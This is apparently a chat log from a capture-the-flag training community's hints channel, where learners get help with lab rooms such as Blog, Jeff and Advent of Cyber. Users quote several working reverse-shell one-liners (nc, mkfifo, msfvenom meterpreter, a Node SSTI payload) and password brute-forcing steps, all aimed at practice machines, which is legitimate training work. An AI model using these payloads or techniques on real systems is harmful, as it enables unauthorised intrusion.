#room-hints
got it, point received, and appreciated
But as a box creator, it's possible
ok, so you would automate the browser as if it were a person (Jack) doing stuff
and that's how the payload would be executed as the one and only Jacky boi, yeah?
Ye
right, but in everyone else's timezone, where you are it's like 5 am, ain't it?
4*, i looked it up 👀
Okay, I am on introductory networking room and doing well, but question 1 of section 5 makes no sense, plz help
do you know what the OSI model is?
Have you analyzed it with Wireshark yet?
have you followed the description's steps to look at the packets?
if you look at the description of the task it shows you exactly how to find the protocol using wireshark
isn't the protocol ||http||
Don't know, I haven't done the room
okay, well thank you for the help, I should get off soon, it is 1am local time XD
just submit whatever wireshark says the protocol is
Hello everyone, newbie here with a quick and hopefully easy question. Working on the Metasploit room and I seem to be stuck on the Task 4, question 7.
While that use command with the unique string can be incredibly useful that's not quite the exploit we want here. Let's now run the command 'search multi/handler'. What is the name of the column on the far left side of the console that shows up next to 'Name'? Go ahead and run the command 'use NUMBER_NEXT_TO exploit/multi/handler' wherein the number will be what appears in that far left column (typically this will be 4 or 5). In this way, we can use our search results without typing out the full name/path of the module we want to use.
When I run it on my kali vm (personal) I get 6, but that is not the correct number apparently. Probably because of a different version from when the room was created. Any ideas on how to figure this one out?
Read the question @silent trellis
The actual question doesn't ask for the number
Look for the question words and question mark.
wow thank you, I feel like a total idiot now lol
any hints on jeff ||jail break jeff user|| or i am in another ||rabbit-hole||
You're on the correct path, google || escaping rbash || and try some things
@wraith marsh googling since morning, another hint would be nice.
Hey, I am doing room Blog and stuck at login. I have the username but dunno about the password
Do I need to brute it?
I tried with rockyou but it's been 1hr and didn't get any pass
I haven't completed the room but I'd suggest to keep looking for information whilst it's brute forcing in the background.
If brute forcing takes more than 5 minutes on THM (10 if your computer is slow or something) then it’s probably wrong
@lime needle
Room creators are told to keep brute forcing under 5 minutes
yeah i guess i am doing something wrong
Task 16 advent of code, after anonymous login to ftp I can't really execute any commands; tried passive mode -p, didn't help. Does this mean there is some restriction on ftp?
Switch vpn servers @white salmon
In polosmb3, when I get the id_rsa file and change permissions/try to connect to ssh with it, should I just be let in or am I meant to try getting a password as well?
If you look at the rsa key does it say it’s encrypted?
Not sure how to look for that.
Cat out the rsa key and see if it says the word “encrypted” anywhere 🙂
No sorry necessary
Then there’s no password
So if you get the username right you should be able to just ssh in
So that would mean I am doing something wrong with the login.
@oblique cliff I tried switching vpn server still same issue, is this known issue?
@cursive nexus most likely wrong username
I have john as the username but it still asks for password.
I haven’t done that room so idk for sure but if you have an unencrypted rsa key that’s the only thing I can think of
Try John, Johnny boi, jj
Idk random stuff
Should it hang if the username is incorrect?
@white salmon switch to passive mode? Uh I’ve seen some people having trouble with ftp sometimes the issue always seems to be using a different vpn server
some OpenSSH versions have a username enumeration exploit
@cursive nexus it may? If it’s the incorrect username for the corresponding rsa key it’ll ask for a password. If it’s correct you’ll be logged in
@white salmon true but that doesn’t always work too well. If I had to guess it’s somewhere on the box
with passive mode
@oblique cliff Thank you for that. I managed to get in :)
Awesome! Wrong username?
@white salmon yes try switching vpn servers then
If that doesn’t work then #site-support
aight I'll try all servers
@oblique cliff Yeah. ||I'd copied over the .pub as well, read that and spotted the real one in there||
I need some hint on Blog (box released yesterday)!
what stage are you on?
I have tried brute forcing, enumerating shares
used steg also on jpgs
didn't get anything!
smb is a rabbit hole
check http and the room tags
that should point you in the right direction
I got username
not all the room tags are visible in the dashboard, if you look at the api call you can find some more ||"tags":["cve 2019-8943","wordpress","blog","web","wpscan","linux","security","cutter","reverse engineering","binary exploitation"]||
tried everything bro anything else?
@wooden mist how can I get password for user in blog
have you tried wpscan @chilly mantle
ya got 2 usernames
if you don't have a shell then you haven't tried everything
have you read and understood the output of wpscan?
also wpscan -h
one of the other findings it gives you is helpful
might help you with the next step
@wooden mist Hi, I already have the shell in the machine (Blog room), I've read and read and I cannot find the way to the user, where can I look?
the additional room hints I posted up there might help you @merry helm
look for other routes
@wooden mist thank you
@median compass thank you
happy hunting
Man nobody has pinged me on the awesome video I left in SMB lol
I never thought of user being a rabbit hole lol
But sometimes the path to user is different than you'd expect
@wooden mist did you find the video?
Yis
¯\_(ツ)_/¯
Well I thought it was funny my cat friend
For RA how do you figure out the username to reset the password. I tried all the ones in the webpage but none worked. Do you just guess names?
Ok thanks. I'll look harder.
the user flag i found on jeff is wrong as per website. 
hash it ;)
do what it says to do
Ah, i thought its over 
almost
ufff... jeff you killed me dude. @blazing rune , thanks man.
I need some help in room Blog, I have credentials and the exploit in msf is giving an error as aborted... thanks in advance
Show your options
I set option rhost ,lhost,user, passwd,targeturi
@crisp wigeon Change payload and run again
show us your options
also, what payload did you choose?
i made sure that only one specific one will work
and if you do a little research about the WordPress version, you'll find it
not sure what research you've done, just offering tips
Can I get a hint what to do next after having reverse shell as www-data in room blog
priv esc
@verbal wedge I used that one payload... googled, some few are using that...
i posted the full tips for the room earlier in here @astral cedar, that should give you a clue
^^
I didnt see them but i trust
@crisp wigeon something is wrong then. Can I see your whole options?
@astral cedar yeah privesc is next like Cry says
Best hint i can give is its not your standard enum -> user -> root
yeha go for it
you can spoiler tag it too
images can be tagged
Thanks guys. I will try harder
you got this
@median compass How can I find it? When I search your name in dc nothing comes
@median compass here you go
Thanks man
||I tried bruteforcing mom's name in Blog, checked about 3000 passwords. Am I going down the wrong path?||
I'm solving HackPark and trying to bruteforce the ||web form|| using hydra. I have tried more than 10k passwords from big.txt. Am I doing anything wrong?
er, yes
@verbal wedge what about bill's username? 😦
big.txt is for dirbuster
you wont get bjoel's
rockyou.txt is for passwords/custom wordlists
@verbal wedge oh
@true widget you're trying to use a directory wordlist for a password brute force, try using rockyou as your wordlist
If you ever crack passwords on THM use rockyou.txt, unless told otherwise. All rooms use passwords that are in the rockyou.txt file.
Okay, initially I was using rockyou.txt but after a few thousand passwords decided to use big.txt as I was unaware that it is a directory wordlist
For environments that contain a WordPress it's always good to run wpscan, it will give you various information about the manager, users, themes... from that you follow with the enumeration
^
Oh man I am losing my mind. I cannot privESC. Can I get 1 more hint? maybe via DM if its too much for here
What have you tried
Found the emails of Billy and his mom, bruteforced them on ssh. Couldn't find anything useful with ||pspy64|| and ||LinEnum||.
Can someone help @crisp wigeon ? It seems his msf options are correct but he keeps erroring
@astral cedar you found nothing unusual with LinEnum?
That's surprising
tried to exploit Sudoers policy plugin version ||1.8.21p2||
okay I will
I think it will make sense a lot when I finish that room
Ye it will
It's also a hint
I'm surprised LinEnum didn't find it
It's like a big red flag
Literally
Maybe Its my mistake
In linpeas i think it’s a more subdued white flag in a sea of green.
Yeee
Guys, I'm doing the Blue room; in the nmap scan I'm using -A but the scan doesn't show the service version
They're showing as filtered
Filtered != open
You can't fingerprint a service that you can't talk to
Fix your VPN
ok
@verbal wedge So I've been banging on this suid for a while, and I can't identify which property it checks, which is necessary (if the tip is feasible)? I've tried to identify it via radare, but nothing that's helped me...
|| strings ||
the box also has ltrace @merry helm, that might help too
Oh thanks @verbal wedge @median compass I still have a lot to learn about reverse engineering
trust me @merry helm, me too! 🙂
Me too lol
#resources has a lot pinned
This technically isn't true RE
The box I just submitted is though
Yeah that
hi, I need help with the room rpmetasploit, everything went well until the 'exploit' command. I am getting 'handler failed to bind to MY_IP_ON_TRYHACKME'
I just can't figure out what I am doing wrong
for "MY_IP_ON_TRYHACKME" I put in my tryhackme/access ip address
you can also use set LHOST tun0 @late night
that will set your local host to the address of your VPN interface automatically
I was advised by two awesome people not to use tun0 as it's hit or miss, bear that in mind ;)
Just type in the IP rather than typing tun0
I see a few IP addresses when I type "ip a", I tried all of them and none of them worked
I'd say that the setting of LHOST is a bit hit and miss in general, that's just a metasploit quirk
tried set LHOST tun0 and that did not work either
seems like a hit or miss for you
either
@late night are you connected to the network through openvpn
In room "Network services", Task 7, Q5, i'm supposed to start a tcpdump using ||"sudo tcpdump ip proto \icmp -i tun0"|| ..
But i get ||tcpdump: tun0: No such device exists - (SIOCGIFHWADDR: No such device)||
How come?
You’re not connected to the vpn
I'm using the in-browser machine
when you do ip a do you see an interface called tun0 @late night?
ahhh, ok, then there's no VPN
@torn pine yes and everything else is working so far
@torn pine you should get told your IP address on the my machine website
You have to set it there I believe
But I haven’t used it so don’t quote me
what addresses do you see @late night?
@trim haven So the syntax for tcpdump is ||"sudo tcpdump [my own ip] proto \icmp -i tun0"||?
Nono
Not your zip
IP*
I’m pretty sure the Kali in browser machine tells you “use this IP”
let me rephrase the question @late night - can you copy the output of ip a here?
According to the awesome staff member James, it’s “Eth0” instead of tun0
ye, i just figured 😂
but the syntax should still be || ip proto|| in the middle? and not the actual ip?
Or should it be ||[target machine ip] [some proto ive no idea which]||?
@torn pine just change the tun0 at the end to eth0 if you're not on a VPN and keep everything else the same
As I said
what you're doing is asking to see all the packets that match that bit in the middle (IP PROTOcol ICMP) that arrive on a particular interface
So it should still be "ip proto".. awesome
for most people that connect over a TUNnel from their own machine that interface is tun0
works now.. fuck me.. ive never used tcpdumps before and google didn't show shit 😄
thanks
Watch the language pls
@median compass [*] exec: ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 08:00:27:23:ff:90 brd ff:ff:ff:ff:ff:ff
inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic noprefixroute eth0
valid_lft 81248sec preferred_lft 81248sec
inet6 fe80::a00:27ff:fe23:ff90/64 scope link noprefixroute
valid_lft forever preferred_lft forever
ok, so you want to set your LHOST to 10.0.2.15
No
That's a virtualbox internal NAT IP
Connect to the VPN on your attacking machine @late night
Not from the host
he's not using a VPN James, he's on the in browser kali box he said
That's a lie.
Because that IP is an internal virtualbox NAT IP
And cannot be the IP of a THM browser kali.
@median compass tried that too, didn't work
@late night you are using virtualbox, correct?
You need to connect to the TryHackMe openvpn from your virtual machine
@median compass I didn't say I am using the browser kali. I am on my own VM using OpenVPN
yeah, you're right - so @late night you need to do `sudo openvpn <creds>.ovpn` after getting connection details from https://tryhackme.com/connect?o=vpn
sorry, think I got you confused with the other guy asking questions at the same time, my bad
@median compass different person using the THM Kali
Ye
@late night I'm guessing you're running the VPN on your host os
For many reasons, that's bad
Run the VPN on your VM directly
@stuck fractal out of curiosity.. why is this worse than through the VM? Only because of not broadcasting the whole host os to the VPN or any other reason?
Because your VPN IP then points to the host
@stuck fractal THAT makes sense
So you need to port forward for reverse shells etc @torn pine
Aahhh, cause of the reverse shells... gotcha
You gloss over a lot of the connectivity stuff because your VM software does NAT
More than rev shells
also puts you in a different broadcast domain so things like sniffing traffic etc won't work
I can get OPENVPN on kali
👍🏻
Thanks soooo much, there were some other things that were coming out differently than they were supposed to, like I kept on getting more open ports when running nmap than I was supposed to
I can't get SKIDY's BACKDOOR working when posting the msfvenom payload into the telnet connection. Nothing shows on either my tcpdump or my netcat listener.. I would expect my netcat listener to become a shell? But absolutely nothing happens... I've triple checked the eth0 IP and nc port...
and even the payload ||mkfifo /tmp/sxbendj; nc 10.10.30.74 4444 0</tmp/sxbendj | /bin/sh >/tmp/sxbendj 2>&1; rm /tmp/sxbendj|| seems fine..
What am i doing wrong?
@torn pine You missed something crucial
😮
You need the prefix .RUN on your command
You're right!!.. thx! 😄
GOT IN !!! (and just got a phone call from the doctor that I have Corona 😦
yikes @late night ... congrats and commiserations both
🙂 the doc said I should live 🙂
@late night dont worry, stay positive and fight back. You will be all right.
Thanks, I hope so
Blog room complete, thanks @median compass for the final clarifications
Grats :)
@merry helm can you give me one hint about the Blog room?
I have no idea how I do the privesc
@verbal wedge and @median compass can you help ?
I'm on the user www-data
where are you at
okay
there we go
so uhhhh
have you run linpeas or linenum or linux-smart-enumeration?
that will give you your answer
itll show there
okay, ty
hello, I'm sorry to ask this late but I was wondering if I could get a hint for the room Vulnversity, I've been having problems on how to find the version of the squid proxy that is running on the machine
Did you enumerate?
Do RP Nmap
it says failed to resolved
I'm very close with the Blog box. It says RCE-HERE and I got the js to execute but dunno how to browse files after it ends? I'm not quite sure how it works fully. I've seen one person who had a command prompt that popped up when he did it but mine didn't have one, any help would be great
@proven pier wat
when I put RP Nmap with the IP and make it run it says failed to resolve
no.
RP Nmap is a room that was suggested for you to do to teach you the skills that are needed to answer the questions you were asking about the room you are having trouble in
youre probably not an idiot
anyone done blog yet?
so I executed the javascript and I got RCE-HERE on the wp page and it also said "open id-48". The way I saw someone else do it, they automated it and had a cmd prompt pop up after the java executed. So I'm just stuck after doing that, what I need to do next to get the exploit to work, if I'm even right. I feel like I am
did you read the tags for the box?
yes, I'm using that exploit, just a different one, because the msf mod won't work so I figured that wasn't the way.
I'm using the RIPS exploit
"riptechs"
msf keeps saying Exploit aborted due to failure: not-found: Failed to access Wordpress page to retrieve theme
metasploit should work
fwiw the msf module worked for me
wow, I spent all this time playing with Java..... gross..... ok well that should help a lot now that I know that
manual way could be fun
@graceful sun if you have issues with it you can pm me if you want
it kinda is....i was really into it. but i just cant figure out how to do it. but it would be fun i think
thank you! @remote gate
has anyone had issues with Blaster not populating the IE history?
@sage belfry known issue
Matt, it's an issue you have to configure to solve
@brave bear No?
@sage belfry you can use another exploit
is the XSS room finicky or something? In challenge 3 the word hello is filtered, so this alert should work, but it's not alerting me anything
nope its supposed to be that way i think
@brave bear theres nothing to configure is what james was saying, it is still a known issue
ohhh okaaay
@oblique cliff You have a js error
alert(hi)
alert("hi")
thanks guys
No idea then
no I know, I'm just trying to get anything to appear as a POC
Tag me again in about 3s
sooo try innovative solutions
@stuck fractal ok...?
ohhh okaaay thats kinda weird yea
streamer mode?
an exploit from https://github.com/SecWiki/windows-kernel-exploits should work on Blaster
long wall of text incoming
I need help with /room/reverseengineering
I got the 2 tasks down and third needs a lot of thought.
var_28h is a password input by the user to be compared against
- What does cmp dword [var_28h], 2 actually do? Does it compare it literally? Or just the first or last bytes?
- What do the dl and al registers do and why do they appear here out of nowhere? Do they point to the same registers like eax but with a different type?
- How do I debug the program so I can input a word and see what the assembly code does to it?
This part is especially harder because I have no idea what it does:
mov eax, dword [var_28h]
cdqe
movzx edx, byte [rbp + rax - 0x20]
mov eax, dword [var_28h]
cdqe
movzx eax, byte [rbp + rax - 0x23]
cmp dl, al
je 0xetcetc
I just want some pointers what to research and learn further
I've been trying my best with reverse engineering and still hardly understand what anything does besides simple if conditionals and string comparisons
- gdb or radare probably
yeah i'm using radare2
ghidra is also a nice tool
the graphical menu with -VV from r2 is the only thing that helped me somewhat understand what the crackme3 file did
it's great
There's Cutter, which is a gui for radare
Cutter is luv
it has nice interface
If I wanted to set the password character length for hydra to just 8 characters, could I just run with -m 8 -M 8 as switches?
There's pw-inspector if you want to filter a wordlist
Looking that up now. Thank you uncle james ♥️
so for example: pw-inspector -i /usr/share/wordlists/rockyou.txt -o rockyou8.txt -m 8 -M 8 would work?
try it and find out
Like a charm, it worked.
anyone give me hint how to get user ||bjoel|| in rooms blog
@sick sun how far have you got so far?
@tough willow again, no one will just give you the answer
People can help
And hint
But you're not going to get an answer to copy paste
what should I do ?
That's not what I asked
There is a file attached to that task
That file is the output of a command
You need to be looking through that file.
So. Have you thought about which of those sub domains might be about web development?
hmm i'm thinking
I think I should be idiot
Short the word "development" and then look harder
I am trying
@tough willow don't post answers here
okay sorry
Guys I need help with the room blog, anyone ?
That's not enough information to give you a hint
Ok can I ask here ?
What bit are you stuck at?
I enumerated usernames found an authenticated rce
Bruteforcing didn't give anything
Brute forcing what, exactly?
Wp login
Both
Please please use spoiler tags.
SecLists top 1000, 10 million pass list
@keen willow I'm not sure how to use that sry😬
Should take a maximum of 5 minutes to brute force
That's a rule that box creators have to follow
Any brute force is under 5mins.
Argh thanks I'm using intruder for the sake of simplicity 😂
Ok I'll try with hydra thanks 🙌
Oh nice I forgot that thanks @stuck fractal
Unless you're told otherwise, assume rockyou if you're brute forcing
See if you can find the room creation guidance if you want to see behind the curtain a little.
@swift magnet wrap spoiler phrase inside two pipe symbol, or google it.
@keen willow alright thanks
@tough willow do some research into the words and phrases mentioned in the question. These tasks are a test of your reading skills.
reading skills
Yes.
I just found the answer with some reading
:(
Read through the results, look for one that matches
You do need to put some effort in.
You're not going to be spoonfed answers
:((
If you're expecting to be spoonfed answers, you've chosen the wrong area of study
I will try only my head hurts
Take a break
You don't really have to ping James.. if you want to ask something you can just ask here
James is sleeping
Hello, I am new here. Can somebody explain why binary shiba1 doesn't execute?
shiba1@nootnoot:~$ ls .
b.txt noon.txt shiba1
shiba1@nootnoot:~$ ./shiba1
shiba1@nootnoot:~$ execute ./shiba1
execute: command not found
shiba1@nootnoot:~$ run ./sh
the binary should be executed like ./shiba1
but it'll work only if you have completed all the requirements from the task
I did, and after I type ./shiba1 it doesn't work
Box: Blog - I see others on here are getting the same error message on Metasploit "Exploit failed: An exploitation error occurred", any ideas?
Oh, no, shame on me, file should have been noot and not noon
sorry for disturbing guys
@subtle terrace no worries you can disturb as much you want.. thats how a person learns ❤️ and we will be happy to help 🙂
Wow, that's called a SERVICE. My pleasure
In advent of cyber day 13 , edited one of the plugin files with shell.php got a connect but it gets stuck
@sturdy shadow I have the same issue. I’ve tried it manually but can’t get it working - I must be doing something wrong. It says it runs fine, and then code execution just does not happen.
I’m still trying but yeah minor issues aha
j
@potent quail Just added the .rb file from Searchsploit as a metasploit module but still the same error, baffled. Probably something simple I am missing:-(
@potent quail @sturdy shadow change the payload, it will help
@crisp wigeon mind if I message please?
go head
Working on "Blog" room. Am I right to be going via ||metasploit|| ? I can't seem to get the exploit to work
@hasty gust yeah you can use Metasploit for that one. If someone completes it manually do let me know
That js one didn't work as expected it should
Yeah I was looking at that too
Can I get a reverse shell with this in advent of cyber day 13 || echo shell_exec("nc.exe -e cmd.exe 10.9.56.17 1234"); ||
I tried to use this || msfvenom -p php/meterpreter_reverse_tcp LHOST=10.9.56.17 LPORT=1234 -f raw > s.php || it connects but can't do anything after it
Tried some windows reverse shells from the internet, they're not working too, been stuck here since morning, any hint please.
If the payload is failing for Blog then check the payload. I'm not sure what causes it to change but it should be meterpreter reverse tcp
Don't use redirection with raw payloads @white salmon
@verbal wedge I had it work with php rev meterpreter
That may work as well
That was the default, I haven't updated msf for a while
RP: burpsuite. Try logging in with invalid credentials. What error is generated when login fails?
help me to get this ?
Have you tried logging in with invalid credentials?
yes, in heroku, where do I find the error?
ok will see
anyone give me a hint to get user ||bjoel||, really stuck, only got user ||www-data||
@sick sun you've made an assumption.
Do standard privesc enumeration
Your goal from www-data should be to get anywhere at all
No you're just wrong
That isn't going to be a suid binary
It's crypto certificate stuff
Use context
yeah I know bro, I found some creds from ||config.php|| but not working, and trying to bruteforce the ||bjoel|| user pass from the ||blog database|| but nothing
context ?
Context. Information like where you found it, what it's called, what the file type is
Do standard privesc enumeration
@stuck fractal
Your goal from www-data should be to get anywhere at all
@stuck fractal
There's your hints
oke thanks bro
Not your bro.
Anybody who completed blog room?
I need some kinda hint 😂
We can't give you a hint unless we know where you are.
@stuck fractal You mean "> s.php" this redirect? . Got shell with metasploit default payload but I'd like to do it manually too
@white salmon yes. You're outputting a binary from msfvenom, use the output flag rather than a redirect
Your binary will be full of control characters and null bytes
It doesn't work with redirects
Ye when I cat the s.php it has weird things and the "<?php" part is commented out
@buoyant hatch just say at what stage you're on
Why the heck are you trying to make a php one?
I'd put it in the 404 page and get shell?
Use a windows one
You can log in with RDP. Why overcomplicate it.
Get a shell as a real user rather than the webserver user.
Hi guys, please a hint for Blog room. I have the reverse shell with www-data user. i run linpeas, linenum, linux-smart-enumeration but i really don't understand how to privesc this room..
Gotcha, start a local webserver and download the exe from there. Can do this because both machines are in the same local network. The box doesn't have internet I think?
You're correct
Thanks 😄
Hi, I need a hint for the Blog room. I ran lse.sh for linux enumeration and I found ||/usr/sbin/checker||, is it the right way?
Please mark as a spoiler
Done
maybe try going down the route and see if it's the right way yourself?
Where should I do the dir scan?
@buoyant hatch huh?
I am doing dir brute force, found nothing 😑
You won't find anything interesting
Yeah I know that from the hint 😁 that's why I asked where I should bruteforce
Any hint
I am trying to do the christmas challenge but i cant find any cookies for the first day question:
What am i doing wrong?
You need to create an account
lel ok
@buoyant hatch maybe trust your instincts and try things
🙄
stuck on the juiceshop portion of the Plethora room. Tried running this ||#{global.process.mainModule.require('child_process').exec('nc -e /bin/bash 127.0.0.1 4444')}|| from one of the writeups and replaced the IP with my tun0 IP but no shell in my listener. Am I headed in the right direction?
@rotund skiff Fun fact. Juiceshop in a docker container breaks ||SSTI|| which is the vuln you're trying to exploit.
The room is broken, you're doing it right
Except nc -e rarely works
alright, so is there a working solution with the docker?
Nope
But you have access to the host OS, so you can get the flag via the container's filesystem
alright, thank you
im stuck after running lse in blog any hints?
@chilly mantle don’t post in multiple channels
didnt ||get|| reply
maybe wait more than 4 minutes?
You waited 3 minutes
ok have seen multiple people ask in both chats soo i posted
@chilly mantle Look at your results.
ok bro
Not your bro.
Missing something important there.
🤨
I am doing task 4, question 2, in room CC: Ghidra. I am having trouble determining "first variable set to". I see the function that should logically set it, but the answer is not correct. I expect the answer to be a two character, negative like number, but maybe my understanding is off
@serene light I haven’t done that room. But the * tell you how many characters the answer should be. So you can look at that as your hint, maybe?
Are you in the decompiler view or the assembly view?
yes it is 2 chars, @oblique cliff --trying the two i expect ... @stuck fractal decompiler
Gotcha that’s the extent of my help on this one then sorry
You might need to convert to decimal
but honestly I dont understand some of the code logic. hmmm. let me think on that decimal conversion for a second...
I'm expecting an int, but will check out decimal
An int is an integer
Decimal means base 10 it can still be an integer
Decimal isn't the datatype
It's the number base
decimal is what you use day-to-day
found ||/usr/sbin/checker|| and need some hint after that
@chilly mantle What do you think you should do with that file?
the answer field expects only 2 characters, not sure decimal will work
Huh?
if it's a number, then that's fine
The standard number system that you learnt to count in
@serene light I don’t think you understood what we meant by decimal. 10, 11, 12.
These are all decimal numbers
we don't mean like 0.1
That'd be a float or a double
basically, you might need to convert hex to a normal number
like 0x13 = 16+3 = 19
Google hex to decimal converter
yeah, definitely misunderstood...
Hello, I'm new and I just want to say I'm learning a lot just from reading you help other people. Thank you @stuck fractal @oblique cliff
Velkommen :)
Some of us who've studied computer science forget that most people don't know decimal/binary/hex
Read the task title @white salmon
The title tells you what you're talking about
Most likely Sudo
So you've been told about man pages and help options
Read those
If that doesn't work, do some googling
That’s to switch users. Sudo is to run a command as a different user
Ahh
And sudo su can make you root, which is useful
yup makes sense
You can't log in as root on ubuntu by default
There's no password set
You have to become root using sudo or login using SSH keys
hi, I'm in room Blog and I'm stuck at the reverse of the checker. Any hint?
ok thank you, I'll try
Hello, is the MACHINE_IP the public IP of the VM?
It is the IP of the machine; none of the machines I know of have public IPs
@winged cypress You need to click deploy.
Thank you for the response. How do I find the MACHINE_IP of the VM I am working with? I use "ifconfig" but I am not sure which ip address I need to use.
@solemn smelt Some do.
When you click "Deploy" in the room, it creates the VM
That will replace MACHINE_IP with the IP of the VM
I see, thank you very much!
That's the machine you're attacking
ifconfig gives you IPs for your machine
Your attacker machine
@serene light so the decimal clarification was helpful. thanks everyone for that. I have determined the correct answer by accident, I am still trying to figure out the logic. not sure how much I can give away here, but I believe it's due to a special character
Thank you @stuck fractal that really helps!
Hey there
in the room "25daysofchristmas" (2019 christmas challenge)
in the task 9 [day4]
subquestion 7
Any hints?
Context
I'm a user on a machine, I am not root and I'm not in sudoers (running sudo -l echoes me a sorry, you cannot use sudo). The question is asking for the hash of mcsysadmin. Easiest way I thought is to look in the /etc/shadow file but I'm not root and I can't sudo. I could theoretically get the hash by trying the most common hash mode and generating the hash for the password that I know, is it like that or am I going off-road and there's another, easier way?
@stuck fractal I completed it!
@chilly mantle See what happens when you actually try?
@turbid spruce Without knowing the salt, you can't generate their hash
forgot about salt and pepper, yeah you're right
There was a line in the supporting material. Sensitive system files are often backed up, with file extensions like .bak
No one cares about pepper
But try looking for .bak files
yeah thanks, I'll do it right now, I appreciate it
Hi, I am doing the "Learn Linux" room. On Task 11 why do we need to create a noot.txt file to run a binary command for shiba1?
the command "./shiba1" means to execute a file called "shiba1" in the current directory, correct? But when using the command "ls", no such file is listed?
never mind, there is a shiba1 file.
Why does the room direct the user to create a noot.txt file, though?
The binary checks that the file exists
If it does, you get the password
ahhh
A binary is just a program
Computers are very cool indeed
fascinating!
Can somebody help with a nudge for the Blog room. I am the www-data user, not sure how to upgrade to the bjoel user. I ran lse, linenum and linpeas but couldn't find anything useful other than the DB and Joel's WordPress password, but that's not valid for bjoel su or ssh. any nudges?
Consider that you don't actually need to upgrade to bjoel.
Hello, I'm on day 11 of Advent of Cyber and stuck on the FTP part, it returns "500 Illegal PORT command.; ftp: bind: Address already in use" every time I try to execute a command like ls or get, should it happen?
Switch to an EU VPN server
Thanks, I'll try
@stuck fractal excuse me again, I'm looking at the system calls but I don't understand how to interact with them. Any suggestion for me please?
Try to understand the code
the entire code or do I need to focus on main?
@potent quail @sturdy shadow change the payload, it will help
@crisp wigeon Thanks that worked.
@white salmon Have you done any RE before?
This is probably basic level RE
nope..
Need a hint for the Bonus challenge in Learn Linux 🙂
Task 43. Only task preventing me from finishing the room
@white salmon I recommend taking a break and learning some basic RE then
Ghidra/cutter/r2
I am trying week 2 of the Christmas challenge now and I found the hidden page
but where am I supposed to search for the password
I've tried a lot and can't find it
...Week 2?
yeah I got it now but I think at the place where I looked
there was supposed to be a link
but it wasn't there
there was no link here xd
think it was supposed to be there?
There wasn't supposed to be a link
you're told it's a GitHub repo
so you do some searching on github
ah okay thx
Blog box - Spent today enumerating and still cannot see a privesc out of www-data or a way to find user.txt. Please can someone point me in the right direction. Many thanks.
Run some privesc enumeration scripts
@stuck fractal Tried most of the usual scripts, maybe spending a day on this box has made me blind:-)
I found it without scripts
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Linux - Privilege Escalation.md
@stuck fractal Thanks
I am having problems decrypting pgp keys, I am getting the following error, gpg: decryption failed: secret key not available
Did you import the secret key?
Are you decrypting keys or files?
What room, task, question?
I used gpg2john to convert the key, then cracked it with john
aaah ok, thanks
just to check, the key is the output from john? of the actual pgp file?
Nope?
I have a room on this coming soon
ok great!
Are you a subscriber?
yeah
You'll be able to do it when it comes out then
Don't have an ETA at the moment, but it's ready to be released
@stuck fractal thank you for the suggestions, I'm starting to practice RE. I will let you know if I have a problem
Just ask here if it's THM content
NamelessOne genius
@stuck fractal Thanks a lot, I will keep an eye out for it!
ZTHObscureWebVulns Task 18, jwt.io says ||an algorithm of none is invalid||, is my setting somewhere else incorrect?
hi, need some help in Blog. thanx
@cedar coral You got to let us know more? Room, task, question, what have you tried and where do you fail?
Hey I found user.txt for Jeff, but it does not seem to work. ||I ran md5sum on user.txt. Ran it on the whole contents and the content between the {}. Did the same with sha1sum but no luck|| What am I doing wrong?
add THM in front of it
Thanks! Got it
moved from general 🙂 . When running hydra I get the below but how do I see the password? STATUS] 1646.00 tries/min, 1646 tries in 00:01h, 14342753 to do in 145:14h, 16 active
[80][http-post-form] host: IP login: USERNAME
1 of 1 target successfully completed, 1 valid password found
When hydra says login rather than username and password, it means it was the same for both
Or you only fuzzed one field (I think, not so sure about this one)
arh okay
Even if you know the username, ^USER^ and -l username
Guess it makes sense 🙂
Hydra is a fairly weird tool for web stuff. Not always as intuitive as it should be
so Retro and Blaster are basically the same room, but I cannot get the Verisign site to open in Retro, so that exploit doesn't work. looked at MuirlandOracle's writeup, but IE never opens
so not completable or just a different way?
It's completable sometimes, really hit or miss
Check the pins in #650425164894568455
you can get privesc on Retro with another exploit
use one from this site: https://github.com/SecWiki/windows-kernel-exploits
can't remember which one
@dull palm what evil maid said. The intended exploit didn’t work for me when I did that room either
I did the room just a few days ago. I had the same struggle. then out of nowhere it suddenly did work, it's a bit wonky
Thank yall, laptop is now having a fit. I will figure it out.
Hey everyone, not very good at reversing/decompiling ELFs. Any advice/resources for dealing with Blog??
try ghidra
Alright I’ll check it out now. Appreciate it 👍
Eh, a decompiler goes a long way here
Hey ninja, I’m not too savvy with Linux decompilers. Did some googling and used gdb/objdump and was able to see what was going on. Ended up running through ghidra and the code is very clear in there.
So working on exploiting it now
I use Cutter
Which is a gui for radare
You can install ghidra's decompiler (Or the appimage for linux ships with it)
Okay, heard lots of people mention radare in other rooms
I’ll check that out as well
@mellow notch just an FYI/hint -- once you see what to exploit, it shouldn't take more than a few seconds to implement. if it does, you're on the wrong track.
@toxic scarab
What he said
Thanks everyone, got it figured out. I have done this exploit before dozens of times.... major brain block for a bit. Idk why I didn’t recognize it immediately.
Room uopeasy, anyone know how to do the SQLi manually? the hint uses sqlmap, but I'd like to learn the manual method. Question 6
Has anyone here finished Learn Linux? Need a hint to finish the final task - The True Ending
Make sure to look really hard through all the user directories you have access to
That's exactly what I am doing right now 😄. I think I found the user who is on the sudoers list.
nice then you should be on track!
so uh... Room uopeasy, I run sqlmap and it doesn't dump anything to answer questions 7 or 8. I ran it as in the hint. Is there something I need to then do after that to dump a certain table? I tried to dump the ||phpmyadmin table|| but that doesn't seem to give anything back
Need help for the attackerkb room, with the question about what type of attacker it is
Go to the exploit page, first "comment" thing
yes on that I have found the webmin official issue page
but don't get
The first comment type thing on there
I get this link from the comment
I've said this 3 times
There is more information here on how the attack was carried out: http://www.webmin.com/exploit.html From the article: > At some time in April 2018, the Webmin…
this one
I have checked that
The page.
But not that comment.
The first comment type thing on there
@stuck fractal
but I don't get anything
I've told you where to look
got it bro
See what happens when you don't ignore when people try to help you?
I'm stuck at [Task 43] Bonus Challenge - The True Ending in Learn Linux
I feel that it's something to do with user shiba2, however no luck.
